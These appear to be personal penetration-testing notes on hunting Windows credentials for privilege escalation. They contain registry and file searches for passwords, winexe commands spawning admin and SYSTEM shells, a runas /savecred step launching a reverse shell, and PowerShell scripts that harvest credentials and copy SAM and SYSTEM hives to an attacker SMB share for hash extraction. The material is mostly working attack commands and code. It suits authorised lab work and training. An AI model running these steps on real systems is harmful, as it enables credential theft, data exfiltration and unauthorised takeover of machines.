Password Hunting

  • Most of these are found automatically by winPEAS

  • This is one of the LAST things I look for: if winPEAS didn't find it, it's probably tedious as hell, so I leave it until the end

Registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
  • TONS of results: /f matches key names, value names and data, so most hits are noise (policy settings, UI strings) and need filtering
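The same registry hunt, as an added PowerShell example (not from the original notes), with a noise filter so the output is shorter than a bare `reg query /f password /s`. It only reports string-typed values, since that is where a plaintext credential can actually sit. The search roots, the credential pattern and the noise list are assumptions chosen here as starting points; keys the current user cannot read are skipped silently.

```powershell
# Added example (not from the original notes): recursive registry hunt for
# credential-looking value names or string data, with a noise filter.
# Assumptions: run in the current user's context; roots, $pattern and $noise
# are starting points chosen for this example, not a complete list.
$pattern     = 'pass(word|wd)?|pwd|credential|secret|connectionstring'
$noise       = 'PasswordPolicy|PasswordExpir|PasswordChange|PasswordLess|PasswordHistory'
$roots       = 'HKLM:\SOFTWARE', 'HKLM:\SYSTEM\CurrentControlSet', 'HKCU:\'
$stringKinds = [Microsoft.Win32.RegistryValueKind]::String,
               [Microsoft.Win32.RegistryValueKind]::ExpandString,
               [Microsoft.Win32.RegistryValueKind]::MultiString

$hits = foreach ($root in $roots) {
    # -ErrorAction SilentlyContinue drops "access denied" on keys we cannot open
    Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        foreach ($name in $key.GetValueNames()) {
            # Only string-typed values can hold a plaintext credential
            if ($key.GetValueKind($name) -notin $stringKinds) { continue }
            $data = [string]$key.GetValue($name)
            if (($name -match $pattern -or $data -match $pattern) -and $name -notmatch $noise) {
                [pscustomobject]@{ Key = $key.Name; Value = $name; Data = $data }
            }
        }
    }
}

$hits | Format-Table -AutoSize -Wrap
```

Extend `$noise` as the target's own junk shows up; a full `HKLM:\SOFTWARE` walk takes a few minutes on a big box, so start with `HKCU:\` and the service keys if time is short.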

.\winPEASany.exe quiet filesinfo userinfo
  • If that turns up a username and password, spawn a shell from Kali with winexe (the account needs local admin on the target, since winexe installs a service)

winexe -U 'admin%password123' //192.168.X.X cmd.exe
  • Or a SYSTEM shell

winexe -U 'admin%password123' --system //192.168.X.X cmd.exe

Saved Creds

.\winPEASany.exe quiet cmd windowscreds
cmdkey /list
  • /savecred only works if cmdkey /list shows a saved credential for that user
  • Start a listener on Kali, then run the payload as the saved user

runas /savecred /user:admin C:\path\to\reverseshell.exe

Config Files

  • Search the current directory tree for credential-looking filenames, then grep config/text files for the word itself

dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
  • A lot of this kind of searching is intuitive, driven by things noticed while enumerating (web roots, script folders, installed apps)
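The two searches above as one added PowerShell example (not from the original notes): a pass over a directory tree for credential-looking filenames, then credential-looking lines inside config/text files, reported as `path:line:` so each hit can be opened directly. The root, extension list, size cap and regexes are assumptions chosen here as starting points, not values from the notes.

```powershell
# Added example (not from the original notes): filename hunt plus content hunt
# for credentials under $Root. $Root, $MaxKB, the extension list and the
# regexes are assumptions for this example; tune them to what enumeration found.
param(
    [string]$Root  = 'C:\',
    [int]   $MaxKB = 2048    # skip big logs/binaries; Select-String is slow on them
)

$nameHint = 'pass|pwd|cred|secret|\.kdbx$|\.pfx$|\.key$'
$exts     = '*.config','*.xml','*.ini','*.txt','*.json','*.yml','*.yaml',
            '*.conf','*.properties','*.env','*.ps1','*.bat','*.cmd'
# key=value, key: value, key="value" or <key>value</key> with a non-empty value
$content  = '(password|passwd|pwd|secret|api[_-]?key|connectionstring)\w*\s*[=:>]\s*"?[^\s"<]+'
# templated or placeholder values: ${VAR}, %VAR%, {{var}}, policy keys
$noise    = '\$\{|%[A-Za-z_]+%|\{\{|PasswordPolicy'

'=== Filenames ==='
Get-ChildItem -Path $Root -Recurse -Force -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -match $nameHint } |
    ForEach-Object { $_.FullName }

'=== Contents ==='
Get-ChildItem -Path $Root -Recurse -Force -File -Include $exts -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -le ($MaxKB * 1KB) } |
    Select-String -Pattern $content -ErrorAction SilentlyContinue |
    Where-Object { $_.Line -notmatch $noise } |
    ForEach-Object { '{0}:{1}: {2}' -f $_.Path, $_.LineNumber, $_.Line.Trim() }
```

Save it as a script and run `.\hunt.ps1 -Root C:\inetpub` (or whatever directory enumeration pointed at); `-match` and `Select-String` are case-insensitive by default, so the patterns do not need `(?i)`.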

SAM

  • With the SAM and SYSTEM hives the local account hashes can be extracted

C:\Windows\System32\config
  • The live hives are locked while Windows is running (and need admin anyway), but the backup copies may be readable

C:\Windows\System32\config\RegBack
C:\Windows\Repair
  • On Windows 10 1803 and later RegBack is normally not populated (0-byte files), so check the file size before bothering
  • Copy to Kali (e.g. an impacket smbserver share) and extract the hashes, then crack or pass them

copy C:\Windows\Repair\SAM \\192.168.X.X\files
copy C:\Windows\Repair\SYSTEM \\192.168.X.X\files
pwdump.py SYSTEM SAM
  • Or with impacket: secretsdump.py -sam SAM -system SYSTEM LOCAL
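A small added PowerShell example (not from the original notes) that checks the backup hive locations before copying, so time is not wasted on the 0-byte placeholders current Windows builds leave in RegBack. The share path is an assumption (an SMB share on the attacker box); readable hives are copied with the source directory in the filename so the RegBack and Repair copies do not overwrite each other.

```powershell
# Added example (not from the original notes): test each backup hive for
# existence and a non-zero size, then copy the usable ones to the attacker share.
# $share is an assumption; replace with the actual SMB share on Kali.
$share      = '\\192.168.X.X\files'
$candidates = 'C:\Windows\System32\config\RegBack', 'C:\Windows\Repair'

foreach ($dir in $candidates) {
    foreach ($hive in 'SAM', 'SYSTEM') {
        $path = Join-Path $dir $hive
        if (-not (Test-Path $path)) { "$path : missing"; continue }
        $len = (Get-Item $path -Force).Length
        if ($len -eq 0) { "$path : 0 bytes (placeholder, useless)"; continue }
        "$path : $len bytes, copying"
        # e.g. SAM-Repair / SYSTEM-Repair so the two sources stay distinguishable
        $dest = Join-Path $share ('{0}-{1}' -f $hive, (Split-Path $dir -Leaf))
        Copy-Item -Path $path -Destination $dest -ErrorAction Continue
    }
}
```

A "0 bytes" result for both RegBack files is the expected outcome on a patched Windows 10/11 box; Repair is the one worth checking on those.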
